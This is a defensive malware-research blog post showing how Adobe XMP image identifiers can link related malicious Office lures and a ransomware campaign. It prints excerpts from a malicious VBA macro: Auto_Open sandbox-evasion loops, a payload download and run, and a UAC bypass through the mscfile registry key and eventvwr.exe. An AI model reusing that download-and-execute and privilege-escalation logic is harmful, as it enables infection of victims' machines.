Blog post by Pedram Amini and Mike Remen
In this blog, we discuss Adobe Extensible Metadata Platform (XMP) identifiers (IDs) and how they can be used as both pivot and detection anchors. Defined as a standard for mapping graphical asset relationships, XMP allows for tracking of both parent-child relationships and individual revisions. There are three categories of identifiers: original document, document, and instance. Generally, XMP data is stored in XML format, updated on save/copy, and embedded within the graphical asset. This last tenet is critical to our needs as we'll be tracking the usage and re-usage of both malicious and benign graphics within common Microsoft and Adobe document lures.
Let's begin with a visual reference. In the following graphic, each column represents a single asset. Each row within that column represents a unique revision or "instance" of that asset. The first column represents the original asset with each subsequent column representing a copy of the previous column:
Each instance of the asset carries three identifiers: the Original Document ID (OID), the Document ID (DID), and the Instance ID (IID). The IID is updated on each saved revision of the asset. The DID remains the same for all revisions but is unique to that copy of the asset. Finally, the OID is a backreference to the original asset from which the copy was derived. We have observed two formats for these identifiers: an MD5-style hash (32 hexadecimal characters) and a GUID (36 characters, including hyphens). Adobe XMP is an old standard, dating back to 2001. To our knowledge, no one has previously applied the standard to malware analysis.
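To make the two observed formats concrete, here is a minimal Python sketch that strips the "xmp.did:" / "xmp.iid:" style prefix seen in tool output and labels what remains. The function name and the "md5" / "guid" labels are our own illustrative choices, not part of the XMP standard.

```python
import re

# Prefix as it appears in tool output, e.g. "xmp.did:" or "xmp.iid:".
PREFIX = re.compile(r"^xmp\.[doi]id:", re.IGNORECASE)
# 32 hexadecimal characters (MD5-style).
HEX32 = re.compile(r"^[0-9a-f]{32}$", re.IGNORECASE)
# 36 characters in the usual 8-4-4-4-12 GUID layout.
GUID36 = re.compile(r"^[0-9a-f]{8}(-[0-9a-f]{4}){3}-[0-9a-f]{12}$", re.IGNORECASE)


def classify_xmp_id(raw):
    """Return (bare_id, fmt) where fmt is 'md5', 'guid', or 'unknown'."""
    bare = PREFIX.sub("", raw.strip())
    if HEX32.match(bare):
        return bare, "md5"
    if GUID36.match(bare):
        return bare, "guid"
    return bare, "unknown"


print(classify_xmp_id("xmp.did:59D68E8C27A2E711964BBD7939DA4803"))
print(classify_xmp_id("xmp.iid:d1b150a4-7321-4874-b61e-ac58bf4f81d2"))
```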
Application and Alternatives
Having detailed the definitions, the question remains: how are these useful? First, graphical assets are commonly re-used across malware lures. Consider, for example, Microsoft Office documents that embed an image coercing the user to "enable content". While the macro and payload may vary from sample to sample, we have observed the same graphical asset re-used across many variants. Second, graphical assets are commonly lifted from legitimate sources. Examples here include fake invoice and phishing scams that embed legitimate company logos. In either case, tracking the usage of a graphical asset can prove valuable.
There are alternatives to XMP, of course. In order from least to most applicable for this use case (in our humble opinion), one can lean on: cryptographic file hashes, Optical Character Recognition (OCR), or perceptual hashes (aHash, pHash, dHash, wHash). While XMP data is easily stripped, when available, it provides advantages over all of these techniques:
- Cryptographic file hashes such as MD5, SHA1, and SHA256 change completely with even a single-bit change to the file.
- OCR is a compute-intensive and error-prone process. We're already seeing malware authors leverage techniques to decrease the efficacy of OCR by, for example, implementing blurring or leveraging different shades of the same color for the foreground text and background. Additionally, not all graphical assets have text.
- Perceptual hashes are also compute-intensive and error-prone, but generically a solid approach to apply when XMP data is unavailable.
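The first point is easy to demonstrate. The following Python sketch hashes a stand-in byte string (not a real image) before and after flipping a single bit; the helper names are ours and purely illustrative.

```python
import hashlib


def flip_lowest_bit(data):
    """Return a copy of data with the lowest bit of its last byte flipped."""
    return data[:-1] + bytes([data[-1] ^ 0x01])


def hex_digits_changed(a, b):
    """Count positions at which two equal-length hex strings differ."""
    return sum(1 for x, y in zip(a, b) if x != y)


original = b"stand-in bytes for an embedded image"
tweaked = flip_lowest_bit(original)

h1 = hashlib.sha256(original).hexdigest()
h2 = hashlib.sha256(tweaked).hexdigest()

print(h1)
print(h2)
print(hex_digits_changed(h1, h2), "of 64 hex digits differ")
```

An XMP identifier embedded in the asset, by contrast, survives such a change as long as the metadata packet itself is left intact.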
In practice, InQuest watches ~1000 unique XMP IDs for the purposes of malware discovery. We utilize YARA hunt rules on top of VirusTotal Intelligence to harvest files into our corpora for further analysis (Deep File Inspection) and cataloging. A significant slice of this data is made freely available to researchers via our free (as in beer) and open InQuest Labs data portal. Search an ever-growing corpus of malicious and benign document samples by artifacts such as URLs, domains, IPs, e-mail addresses, file names, and XMP IDs. Upload documents for analysis and inclusion in the corpus. The usage of XMP IDs to anchor on new samples frequently results in the discovery of novel documents with low AV detection rates. Throughout the remainder of this blog, we'll reference samples from labs.inquest.net so that readers can follow along with real-world samples.
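For readers who want to experiment with the hunting idea, here is a hedged Python sketch that renders a simple YARA rule from a list of XMP IDs. This is not InQuest's production rule set: the rule name, the one-string-per-ID layout, and the "any of them" condition are our own assumptions, and the sketch assumes the XMP packet is stored as plain single-byte text inside the file.

```python
import re

# Only accept hex-and-hyphen IDs so nothing unexpected lands inside the rule text.
SAFE_ID = re.compile(r"^[0-9A-Fa-f-]{32,36}$")


def build_yara_rule(rule_name, xmp_ids):
    """Render a YARA rule that matches when any watched XMP ID appears in a file."""
    lines = [f"rule {rule_name}", "{", "    strings:"]
    for n, xmp_id in enumerate(xmp_ids):
        if not SAFE_ID.match(xmp_id):
            raise ValueError(f"unexpected XMP ID format: {xmp_id!r}")
        lines.append(f'        $id{n} = "{xmp_id}" ascii nocase')
    lines += ["    condition:", "        any of them", "}"]
    return "\n".join(lines)


# "xmp_watchlist_sketch" is a hypothetical rule name.
print(build_yara_rule("xmp_watchlist_sketch", ["59D68E8C27A2E711964BBD7939DA4803"]))
```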
Microsoft Office DOCX with PNG
We begin with a simple sample. A Microsoft Office Word Document, in DOCX format:
Beginning in 2007, Microsoft changed the default document file format from the Compound Document Format (CDF/OLE) to the Open XML format. These files can simply be renamed from .docx to .zip and decompressed with standard tools. Simply unzipping this document will reveal the following image in the path ./word/media/image1.png:
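Because a DOCX is a ZIP archive, the same extraction can be scripted without renaming the file. A minimal Python sketch using only the standard library follows; the function name is ours, and the "word/media/" path is the location shown above.

```python
import zipfile


def list_media(docx):
    """Return [(member_name, raw_bytes)] for every file under word/media/.

    `docx` may be a filesystem path or a file-like object.
    """
    found = []
    with zipfile.ZipFile(docx) as archive:
        for name in archive.namelist():
            if name.startswith("word/media/") and not name.endswith("/"):
                found.append((name, archive.read(name)))
    return found


# Usage, assuming a sample saved locally as "sample.docx" (hypothetical name):
# for name, data in list_media("sample.docx"):
#     print(name, len(data), "bytes")
```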
A classic malware lure that entices the user into enabling active content which, in turn, will execute malicious macro logic to pivot to further payload stages. Note that this document lure triggers detection through analysis of the semantic context embedded within the image and extracted via Optical Character Recognition (OCR). You can see that layer exposed via InQuest Labs as depicted here in a screenshot excerpt:
Use the labs portal to pivot to other samples with coercive content in the OCR or plain-text semantic layers. While this blog is not intended to cover the specifics of the macro malware, this is a well-rounded sample in the sense that it combines data from multiple layers in an attempt to avoid detection, so we'll take a slight detour to dissect it. These layers are trivially exposed through Deep File Inspection (DFI), a core tenet of the InQuest platform. Readers can follow along via this direct link on InQuest Labs. We begin with the following excerpt from the "Embedded Logic" layer, which is executed upon document open via the startup hook "Auto_Open()":
For i = 1 To 65535555
  If i = 65535555 Then
    For t = 1 To 65535555
      If t = 65535555 Then
        For b = 1 To 65535555
          If b = 65535555 Then
            For a = 1 To 65535555
              If a = 65535555 Then
                For x = 1 To 65535555
                  If x = 65535555 Then
Five nested loops, each counting to 65,535,555. Because each inner loop is entered only on the final iteration of its parent, the counts add rather than multiply, for a total of 5 x 65,535,555 = 327,677,775 seemingly superfluous loop iterations before the next block of logic is executed. What's the purpose of this? Probably an attempt at evading sandbox technologies that leverage dynamic analysis to monitor the behavior of samples in a controlled environment. By their nature, sample detonations must be limited in some way, be it based on time or instruction count. You can read more about sandbox technologies in our previous blog Defense in Depth: Detonation Technologies. Looking beyond this evasion logic, note that data is read from the "Semantic Context" layer of the document:
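The iteration count is worth a quick sanity check. The Python sketch below mirrors the shape of the macro excerpt (each inner loop starts only when its parent reaches its limit) with a small limit so it runs instantly, then applies the same arithmetic to the real limit. The function name is ours.

```python
def count_iterations(limit, depth):
    """Count loop passes when each inner loop runs only on the parent's last pass."""
    if depth == 0:
        return 0
    total = 0
    for i in range(1, limit + 1):
        total += 1
        if i == limit:
            # The inner loop is entered exactly once, on the final pass.
            total += count_iterations(limit, depth - 1)
    return total


# With a small limit the additive behaviour is easy to confirm.
assert count_iterations(7, 5) == 5 * 7

# Same arithmetic with the limit used by the macro.
print(5 * 65535555)  # 327677775
```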
Set c = ActiveDocument.Content
The data read is:
The "Start" and "End" markers are then stripped off and subsequent payload downloaded, executed, and hooked into the Windows Registry for persistence. The key lines of code from the VBA macro are shown here:
StartWord = "Start": EndWord = "End"
...
geturl = Replace(Replace(c.Text, StartWord, ""), EndWord, "")
...
Call DownloadFile(URLtoFile, FilePath + "\payload.exe")
...
Call RegiWrite("HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command\", FilePath + "\payload.exe")
...
RetVal = CreateObject("WScript.Shell").Run("eventvwr.exe")
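An analyst can recover the download URL statically by applying the same marker stripping to the document's plain text. Here is a minimal Python sketch of that step; the function name, the trailing-whitespace trim, and the placeholder URL are our own additions and are not taken from the sample.

```python
def extract_url(document_text, start_word="Start", end_word="End"):
    """Mimic the macro's nested Replace() calls on the document text.

    Like VBA's Replace, this removes every occurrence of each marker.
    The strip() is an extra convenience for trailing paragraph marks.
    """
    return document_text.replace(start_word, "").replace(end_word, "").strip()


# Placeholder text standing in for the document body (not the real sample data).
print(extract_url("Starthttp://example.invalid/stage2End\r"))
```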
The final executable payload, test.exe (VirusTotal, Joe Sandbox), turns out to be a harmless pentest sample of sorts as the executable is downloaded from http://bech0r.net, home to a legitimate security researcher (side note: awesome background cinematic hacker ambient beat on this site… this is the soundtrack we're using to kick off all hack sessions moving forward). Here is a screenshot of the benign output indicating the success of the execution of the lure:
Switching focus back to the task at hand, let's examine the AV consensus for the document lure on VirusTotal. Detection rates began with 14 vendors on 7/15/2018 and matured to 31 vendors on 9/24/2019, as depicted here:
We can leverage standard Linux command-line tools to extract the XMP IDs from the image:
$ strings ./word/media/image1.png | grep xpacket | xmllint --format - | grep iid
<rdf:Description xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#"' xmlns:xmp="http://ns.adobe.com/xap/1.0/" rdf:about="" xmpMM:OriginalDocumentID="xmp.did:59D68E8C27A2E711964BBD7939DA4803" xmpMM:DocumentID="xmp.did:5F6437DAA22811E7975EC6C88D5BC4AF" xmpMM:InstanceID="xmp.iid:5F6437D9A22811E7975EC6C88D5BC4AF" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:59D68E8C27A2E711964BBD7939DA4803" stRef:documentID="xmp.did:59D68E8C27A2E711964BBD7939DA4803"/>
Or, alternatively, use the ever popular Exiftool:
$ exiftool ./word/media/image1.png | grep -i xmp
XMP Toolkit : Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27
Original Document ID : xmp.did:59D68E8C27A2E711964BBD7939DA4803
Document ID : xmp.did:5F6437DAA22811E7975EC6C88D5BC4AF
Instance ID : xmp.iid:5F6437D9A22811E7975EC6C88D5BC4AF
Derived From Instance ID : xmp.iid:59D68E8C27A2E711964BBD7939DA4803
Derived From Document ID : xmp.did:59D68E8C27A2E711964BBD7939DA480
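For bulk processing, the same extraction can be approximated in Python with a regular expression over the raw file bytes. This is a rough sketch: it assumes the XMP packet is stored uncompressed as single-byte text, and the function name and the upper-casing of results are our own choices.

```python
import re

# "xmp." + one of d/o/i + "id:" followed by a 32-36 character hex-and-hyphen ID.
XMP_ID = re.compile(rb"xmp\.([doi])id:([0-9A-Fa-f-]{32,36})")


def find_xmp_ids(blob):
    """Return sorted, de-duplicated (kind, id) pairs found in raw bytes."""
    hits = {
        (m.group(1).decode(), m.group(2).decode().upper())
        for m in XMP_ID.finditer(blob)
    }
    return sorted(hits)


sample = (
    b'xmpMM:DocumentID="xmp.did:5F6437DAA22811E7975EC6C88D5BC4AF" '
    b'xmpMM:InstanceID="xmp.iid:5F6437D9A22811E7975EC6C88D5BC4AF"'
)
for kind, value in find_xmp_ids(sample):
    print(kind, value)
```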
Regardless of the approach, we're going to leverage the IOC pivot tool on InQuest Labs to search for other samples that may contain images derived from the same parent asset (59D68E8C27A2E711964BBD7939DA4803).
The pivot reveals two additional samples:
- 6b0aad2732169740ba5556ec7a8c90da05af208971a3821ab0c9c1fbdc4961f5 (VT, InQuest Labs)
- 0aa7b1554cf5a8deb29b145041623d7c67e42c04801637adb02b26203a96caaa (VT, InQuest Labs)
Detection rates for sample 6b0aad27 started with 20 vendors on 8/19/2018 and matured to 34 vendors on 9/24/2019. Detection rates for 0aa7b155 started with only 6 vendors on 8/19/2019 and matured to 19 vendors on 9/24/2019. Their relevant scan histories are depicted below:
We can immediately see the value of leveraging XMP IDs to identify related and potentially stealthier samples of the same campaign. As a generalized workflow:
- Ingest files from a variety of sources, both benign and malicious.
- Extract graphical assets looking for XMP identifiers.
- Catalog these identifiers and reference that catalog for pivoting to other samples.
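The cataloging and pivoting steps of this workflow can be sketched in a few lines of Python. This is an in-memory illustration only, not how InQuest Labs is implemented; the class name, method names, and sample labels are hypothetical.

```python
from collections import defaultdict


class XmpCatalog:
    """Map each XMP identifier to the set of samples it was seen in."""

    def __init__(self):
        self._samples_by_id = defaultdict(set)

    def add(self, sample_hash, xmp_ids):
        """Record that a sample contained the given identifiers."""
        for xmp_id in xmp_ids:
            self._samples_by_id[xmp_id.upper()].add(sample_hash)

    def pivot(self, xmp_id):
        """Return every sample that carries the given identifier."""
        return sorted(self._samples_by_id.get(xmp_id.upper(), set()))


catalog = XmpCatalog()
# "sample_a" and "sample_b" are placeholder labels standing in for file hashes.
catalog.add("sample_a", ["59D68E8C27A2E711964BBD7939DA4803", "5F6437DAA22811E7975EC6C88D5BC4AF"])
catalog.add("sample_b", ["59d68e8c27a2e711964bbd7939da4803"])
print(catalog.pivot("59D68E8C27A2E711964BBD7939DA4803"))
```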
Researchers already employ similar tactics on IP and domain IOCs. This approach provides a pivot engine for a subset of file content.
Microsoft Office DOCX with JPG
Having demonstrated the fundamental value of XMP identifier pivoting, let's dive into another DOCX example, this time with an embedded JPG. This sample is also available on InQuest Labs so readers can follow along. The SHA256 hash value is:
AV consensus on this malicious document lure started with 6 vendors on 7/22/2019 and matured to 32 vendors by 9/29/2019. Once again, downloading, renaming to .zip, and decompressing the archive results in the discovery of a graphical asset, ./tge-zip-1-1/word/media/image2.jpeg, shown here:
There's another image in the media folder, image1.jpeg; we'll circle back to that shortly. Looking at the extracted IOCs panel under InQuest Labs, we see a number of XMP IDs in both GUID and MD5 formats:
The XMP IDs above are collected from all graphical assets that were discovered in the DFI process. We can pivot on each of the IOCs directly from the interface, which will include the "xmp.[doi]id:" prefix. Stripping the prefix will expand our search and we've curated the complete list for your convenience and exploration here:
While we're focused on XMP pivots in this blog, readers should note that there are other interesting pivots that can be made as well, including:
- OCR pivot: https://labs.inquest.net/dfi/search/ext/ext_ocr/enable%20content
- IP IOC pivot: https://labs.inquest.net/dfi/search/ioc/ip/18.104.22.168
Let's manually extract the XMP identifiers from image2.jpeg using Exiftool and focus solely on those:
$ exiftool image2.jpeg | grep -i xmp
XMP Toolkit : Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27
Instance ID : xmp.iid:CAE628A27467E911AD18A821864C67C5
Document ID : xmp.did:B3D4F1219157E911B37B9950729CB11D
Original Document ID : xmp.did:B3D4F1219157E911B37B9950729CB11D
History Instance ID : xmp.iid:B3D4F1219157E911B37B9950729CB11D, xmp.iid:CAE628A27467E911AD18A821864C67C5
Derived From Instance ID : xmp.iid:C9E628A27467E911AD18A821864C67C5
Derived From Document ID : xmp.did:B3D4F1219157E911B37B9950729CB11D
Derived From Original Document ID: xmp.did:B3D4F1219157E911B37B9950729CB11D
The instance ID for this specific asset is CAE628A27467E911AD18A821864C67C5. Looking one level up, at the document ID or original document ID, we see B3D4F1219157E911B37B9950729CB11D. We can pivot on this identifier through InQuest Labs:
As of the time of this writing, the above search results in 88 different XMP records spread across 44 unique files. The complete list of SHA256 hashes is listed here in alphabetical order. We've highlighted the 8th hash below, more on this sample in the next segment.
More Interesting Pivots
Recall that earlier in the blog we compared and contrasted a variety of methods for tracking graphical asset re-use across malware lures: cryptographic file hashes, perceptual hashes, and OCR-based semantic extraction. We posited that, when available, XMP identifiers provide a fast and valuable alternative to these methods. Let's take a look at the highlighted 8th hash from the list above:
This document lure provides a great example of the value of the XMP approach. Here's image2.jpeg from that sample:
Note that it is the German language equivalent of the image2.jpeg from the original lure. The unique instance ID for this asset is B6D4F1219157E911B37B9950729CB11D, as shown here through Exiftool:
$ cat image2.jpeg.exiftool | grep -i xmp
XMP Toolkit : Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27
Instance ID : xmp.iid:B6D4F1219157E911B37B9950729CB11D
Document ID : xmp.did:B3D4F1219157E911B37B9950729CB11D
Original Document ID : xmp.did:B3D4F1219157E911B37B9950729CB11D
History Instance ID : xmp.iid:B3D4F1219157E911B37B9950729CB11D
Derived From Instance ID : xmp.iid:B5D4F1219157E911B37B9950729CB11D
Derived From Document ID : xmp.did:B3D4F1219157E911B37B9950729CB11D
Derived From Original Document ID: xmp.did:B3D4F1219157E911B37B9950729CB11D
But the asset shares the same parent ID, B3D4F1219157E911B37B9950729CB11D, with CAE628A27467E911AD18A821864C67C5. To think about this in human terms: an initial asset was created and saved, then the text was translated and the asset resaved, producing two unique assets with the same parent ID. While this relationship can also be derived from a perceptual hash, the XMP approach is far cheaper, since it requires only a string comparison rather than image processing. Again, readers should note that other pivot options are available, for example, searching for the German language equivalent of "Enable Content".
Recall from earlier in the DOCX with JPG example that we glossed over image1.jpeg. Let's circle back and take a look at that image now:
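The sibling relationship can be checked mechanically. The Python sketch below parses exiftool-style "Tag : value" text into a dictionary and compares the Document ID of the two assets; the function names are ours, and only the two relevant fields from each output above are included.

```python
def parse_exiftool(text):
    """Parse 'Tag Name : value' lines into a dict, splitting on the first colon."""
    fields = {}
    for line in text.splitlines():
        tag, sep, value = line.partition(":")
        if sep:
            fields[tag.strip()] = value.strip()
    return fields


def same_parent(a, b, tag="Document ID"):
    """True when both assets carry the same non-empty value for `tag`."""
    return bool(a.get(tag)) and a.get(tag) == b.get(tag)


english = parse_exiftool(
    "Instance ID : xmp.iid:CAE628A27467E911AD18A821864C67C5\n"
    "Document ID : xmp.did:B3D4F1219157E911B37B9950729CB11D\n"
)
german = parse_exiftool(
    "Instance ID : xmp.iid:B6D4F1219157E911B37B9950729CB11D\n"
    "Document ID : xmp.did:B3D4F1219157E911B37B9950729CB11D\n"
)

print(same_parent(english, german))                      # shared parent
print(english["Instance ID"] == german["Instance ID"])   # distinct instances
```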
It looks like a template for a structured resume. The profile shot looks legitimate as well, though who knows in this day and age of generative algorithms. Carving out the profile photo and feeding it through the TinEye reverse image search, we get a match on Dr. Britta Höllermann, a [German university research assistant](https://www.geographie.uni-bonn.de/research/rg/rg-evers/staff/britta-hoellermann) whose identity is seemingly being leveraged as part of the social engineering dimension of this malware campaign. Let's compare the XMP identifiers between the image above and the image found via the reverse image search below:
# malware lure embedded image.
$ exiftool image1.jpeg | grep -i xmp
XMP Toolkit : Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27
Instance ID : xmp.iid:78113FDD7F57E911B37B9950729CB11D
History Instance ID : xmp.iid:77113FDD7F57E911B37B9950729CB11D
Document Ancestors : xmp.did:97ba5d41-3019-4fa8-8e66-c2edb9f4b5e8
# reverse image search discovered match.
$ wget https://www.geographie.uni-bonn.de/forschung/ags/ag-evers/Team/1bh.jpg
$ exiftool 1bh.jpg | grep -i xmp
XMP Toolkit : Adobe XMP Core 5.5-c002 1.148022, 2012/07/15-18:06:45
Document ID : xmp.did:97ba5d41-3019-4fa8-8e66-c2edb9f4b5e8
Instance ID : xmp.iid:d1b150a4-7321-4874-b61e-ac58bf4f81d2
History Instance ID : xmp.iid:635cbfe1-2c45-49f0-9158-19ec213c86e7, xmp.iid:ca378365-ad41-4284-8cb7-e8b627602372, xmp.iid:97ba5d41-3019-4fa8-8e66-c2edb9f4b5e8, xmp.iid:C4C93C76192068118083F8015B1BC4AF, xmp.iid:73B02411182068118083CE7276DA08A4, xmp.iid:0dad9cdc-3dc6-4118-8a5c-bb239234984a, xmp.iid:C5C93C76192068118083F8015B1BC4AF, xmp.iid:20659034222068118083CE7276DA08A4, xmp.iid:c5056276-dc8e-4f38-9aae-f04096a86fda, xmp.iid:AD90EF6D362068118083F8015B1BC4AF, xmp.iid:AE90EF6D362068118083F8015B1BC4AF, xmp.iid:222AB06C382068118083CE7276DA08A4, xmp.iid:d1b150a4-7321-4874-b61e-ac58bf4f81d2
Derived From Instance ID : xmp.iid:AD90EF6D362068118083F8015B1BC4AF
Derived From Document ID : xmp.did:97ba5d41-3019-4fa8-8e66-c2edb9f4b5e8
Notice the overlap here. The ancestor document GUID from the malware lure matches the document ID of the asset discovered via reverse image search. Pivoting from this XMP identifier, we're able to enumerate other malware samples that impersonate Dr. Höllermann. We found ~150 unique malware samples with an average of ~10 AV detections on samples that overlap with VT. Tracing the campaign further, we determined that the majority of the final delivered executable payloads are ransomware, one example instance being:
We hope to have inspired additional research into sample clustering through XMP identifier relationships, and we look forward to feedback from the community on how we can make InQuest Labs an invaluable tool for your research projects. Get in touch with us directly via Twitter or e-mail.
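The overlap can be found programmatically by stripping the "xmp.did:" / "xmp.iid:" prefix and folding case before comparing, since the same GUID can appear under different prefixes and in mixed case. A minimal Python sketch, using a subset of the identifiers listed in the two outputs above (the function name is ours):

```python
import re

PREFIX = re.compile(r"^xmp\.[doi]id:", re.IGNORECASE)


def bare_ids(values):
    """Strip the xmp.?id: prefix and lower-case so identifiers compare cleanly."""
    return {PREFIX.sub("", value.strip()).lower() for value in values}


lure_ids = bare_ids([
    "xmp.iid:78113FDD7F57E911B37B9950729CB11D",      # Instance ID
    "xmp.iid:77113FDD7F57E911B37B9950729CB11D",      # History Instance ID
    "xmp.did:97ba5d41-3019-4fa8-8e66-c2edb9f4b5e8",  # Document Ancestors
])
web_ids = bare_ids([
    "xmp.did:97ba5d41-3019-4fa8-8e66-c2edb9f4b5e8",  # Document ID
    "xmp.iid:d1b150a4-7321-4874-b61e-ac58bf4f81d2",  # Instance ID
    "xmp.iid:AD90EF6D362068118083F8015B1BC4AF",      # Derived From Instance ID
])

overlap = lure_ids & web_ids
print(overlap)
```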